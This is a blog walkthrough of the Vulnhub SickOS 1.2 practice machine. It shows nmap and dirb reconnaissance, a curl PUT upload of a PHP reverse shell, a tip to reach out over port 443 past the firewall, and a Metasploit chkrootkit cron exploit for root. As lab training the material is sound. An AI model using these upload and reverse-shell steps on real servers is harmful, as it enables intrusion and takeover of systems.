rr Vulnhub SickOS 1.2 Walkthrough | The Hackers Store



Vulnhub SickOS 1.2 Walkthrough

Hello Friend!, I know i was inactive on this blog for a while but now im planing to be active, anyways today I am going to show how I Pwned...

Hello Friend!, I know i was inactive on this blog for a while but now im planing to be active, anyways today I am going to show how I Pwned Vulnhub SickOS 1.2 machine and will give you a walkthrough for the same.

Description of SickOs 1.2 on Vulnhub:
This is second in following series from SickOs 1.2 and is independent of the prior releases, scope of challenge is to gain highest privileges on the system.
Difficulty: beginner

Vulnhub SickOS 1.2 Walkthrough : Lets Get Started!!

First we need to find out the target machine's (SickOs 1.2) IP inorder to gather information about it.
Here i simply used nmap -sn option: Host Discovery option with my IP and scanned the whole subnet and I Got the IP address of my machine running on Virtualbox which is SickOs 1.2.
root@r00t3v1l:~# nmap -sn
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for
Host is up (0.0036s latency).
MAC Address: 98:2F:3C:DE:AD:05 (Sichuan Changhong Electric)
Nmap scan report for
Host is up (0.00038s latency).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.12s latency).
MAC Address: 34:E6:AD:A3:E3:23 (Intel Corporate)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.32 seconds
Now that we have the IP address its time for nmap scan to detect open ports and the services running on them

Here I have used nmap :
  • -sV option to scan for service versions
  • -sC option to to use common nmap nse scripts
  • -p- or -p 0-65535 option to scan all the ports
root@r00t3v1l:~# nmap -sV -sC -p-
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-20 22:54 IST
Nmap scan report for
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:90:16:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.59 seconds
 So far we have found 2 ports open:
  • 22 SSH
  • 80 http
I opened port ip in the browser but found nothing useful

So I ran dirb to look for potential hidden directories on SickOs 1.2 vulnerable machine and found /test/ directory.

root@r00t3v1l:~# dirb
DIRB v2.22   
By The Dark Raver
START_TIME: Wed Jun 20 23:25:34 2018
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612                                                         

---- Scanning URL: ----
+ (CODE:200|SIZE:163)                           
==> DIRECTORY:                                      
---- Entering directory: ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                
END_TIME: Wed Jun 20 23:25:35 2018
Checked the /test/ directory but found that it is running lighttpd 1.4.28 server. Quickly check for its available exploits but got nothing working.

On looking for the available HTTP methods on this /test/ directory using curl found that the PUT method is allowed, which we can use to upload files on this directory.

root@r00t3v1l:~# curl -vv -X OPTIONS
*   Trying
* Connected to ( port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host:
> User-Agent: curl/7.60.0
> Accept: */*
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Content-Length: 0
< Date: Wed, 20 Jun 2018 18:09:47 GMT
< Server: lighttpd/1.4.28
* Connection #0 to host left intact
I uploaded a php reverse shell using PUT HTTP method vulnerability on the /test/ directory using curl and got a lovely message "We are completely uploaded and fine"

root@r00t3v1l:~# curl -v --upload-file /root/shell.php -0
*   Trying
* Connected to ( port 80 (#0)
> PUT /test/r00t.php HTTP/1.0
> Host:
> User-Agent: curl/7.60.0
> Accept: */*
> Content-Length: 5494
* We are completely uploaded and fine
* HTTP 1.0, assume close after body
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Wed, 20 Jun 2018 18:15:13 GMT
< Server: lighttpd/1.4.28
* Closing connection 0

Now simply setup a netcat nc listener and make a http request to your uploaded reverse shell through your browser. and WOAH!!! you have a limited shell on the server.

Now one thing here i have noticed that reverse shell is blocked on strange ports like 4444 or 1337 maybe due to rules set on iptables probably. It worked when i used port 443 for the same purpose.

 Well this is a limited shell we have got, if you want you can upgrade to fully interactive TTY shell using:
python -c 'import pty; pty.spawn("/bin/bash")'
After enumerating the SickOs 1.2 vulnhub machine for some time I found that a vulnerable cronjob is running with name chkrootkit whose metasploit exploit is available...


but for this we need a reverse shell session on metasploit so we will use
Unfortunately interpreter is not working here.

msf exploit(multi/handler) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Command shell session 2 opened ( -> at 2018-06-21 00:28:34 +0530

Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 11:58:33 up 34 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ^Z
Background session 2? [y/N]  y
msf exploit(multi/handler) >
Background the session using CTRL +Z
Now Simply run the chkrootkit exploit and set your reverse shell session ID to it and hit EXPLOIT!! :D

msf exploit(multi/handler) > use exploit/unix/local/chkrootkit
msf exploit(unix/local/chkrootkit) > show options

Module options (exploit/unix/local/chkrootkit):

   Name        Current Setting       Required  Description
   ----        ---------------       --------  -----------
   CHKROOTKIT  /usr/sbin/chkrootkit  yes       Path to chkrootkit
   SESSION                           yes       The session to run this module on.

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/local/chkrootkit) > set SESSION 2
msf exploit(unix/local/chkrootkit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP double handler on
[!] Rooting depends on the crontab (this could take a while)
[*] Payload written to /tmp/update
[*] Waiting for chkrootkit to run via cron...
Now we have to wait for chrootkit to run. Here the thing the chrootkit cronjob runs once a day so you have to wait for it to run and after that you will get a root shell.

SO this was Vulnhub SickOS 1.2 Walkthrough, hope if enjoyed reading it. please do leave your valuable comments below if it helped you :)



0day,4,404,1,Account,1,Acunetix,1,Adobe,1,Android,12,anonymity,3,Antivirus,5,Apk,2,App Store,1,audio,1,backdoor,1,Backtrack Tutorials,6,Binders,1,Blogger,9,blogger templates,1,blogging,1,boot2root,1,Booters,1,Breach,1,Brute Force Cracking,4,bug bounty hunting,3,business,1,c99,1,Cain and Abel Tool,3,Candy Crush Soda Saga,1,CEO,1,clone,5,Command Prompt Hacks,2,computer,1,Computer Tricks,5,cookie,1,Cookie Stealing,2,cookies,1,Corrupt,1,Cpanel Cracking,1,Cpanels,1,cracked apk,1,Cracked PC Game Latest,1,cracking,9,Create Virus,2,Cross site Scripting,3,Crypter,1,Cryptography,1,CTF,1,Cyber News,9,Cyber War,1,darknet,1,Data,1,Database Hacking,4,DDOS,1,DDoS Attack Pack,1,deepweb,2,deface,4,Dictionary Attacks,2,DNN,1,DNS Hacking/Hijacking,2,Domain,3,Dorks,2,Dos/DDos,3,Doxing,2,Drupal,1,Election Commission,1,Email Hacking,14,EVM Hacking,1,Exploits,12,Extratorrents,1,Facebook,31,Facebook Hacks,29,Fake Call,2,Features,1,free,1,Free Minutes,3,Free Recharge,6,Free Softwares,20,Freeze,1,FreeZone,9,Games,7,Gmail Hacks,15,Gold,1,Google Chrome Tricks,4,google dorks,2,Google Play Store,1,Google Tricks,8,Grand Theft Auto 5 {G.T.A V },1,hack cctv camera,1,Hacking,37,hacking Tools,24,Hacking Tricks,28,Hash Codes Cracking,5,Hash Types,1,havij,1,hotmail,2,how to,12,HTML Injection,1,images,1,information gathering,1,Information Security,1,Information Security Event,1,Information Security Summit,1,internet,2,internet hacks,33,Internet security,1,ip hacking,1,javascript,2,Joomla,2,kali,6,Kali Linux,3,Keyloggers,11,Kickass Torrents,1,Latest,1,LinkedIn,1,linux,1,Lucky Patcher,1,lucky patcher cracked,1,lucky patcher cracked latest,1,MAC,1,Make Money,6,Malware Protection,2,MD5 Cracking,1,messages,1,Messenger,1,Metaspolit,4,MMS,1,Mobile Tricks,22,Modded APK,3,Modded quickly,1,Netbios Hacking,1,network security,10,News,3,Notepad Tricks,2,operating system,2,OphCrack,1,OSINT,1,OurMine,1,password Crack,7,PC,1,pentesting,7,pentesting tools,5,Phishing,1,Phising,1,Prank calls,1,RAT,4,RAT's,1,receive,1,reconnaissance,3,redirect,1,remote hacking,3,Rockstar,1,Scanner,2,Security,3,security tips,10,send,1,SEO,3,Sharecash,1,Shell,5,Shell Upload,3,Sms,1,SMS Bomber,1,Social Engineering,2,Spoofing,1,SQL,13,SQL Hacks,10,SQL Injection,2,Stealers,1,Tech News,8,template,5,text,1,tips,1,Torrents,2,tricks,10,twitter,1,video,1,Virusses,1,VLC Media Player Tricks,4,Vulnerability,23,vulnhub,1,Web Application Vulnerability,17,Webcam (Cam),1,website hack,42,WhatsApp,1,WHMCS Hacking,1,Windows Hacks,16,Wordpress,1,writeup,1,XSS,6,yahoo,3,
The Hackers Store: Vulnhub SickOS 1.2 Walkthrough
Vulnhub SickOS 1.2 Walkthrough
The Hackers Store
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy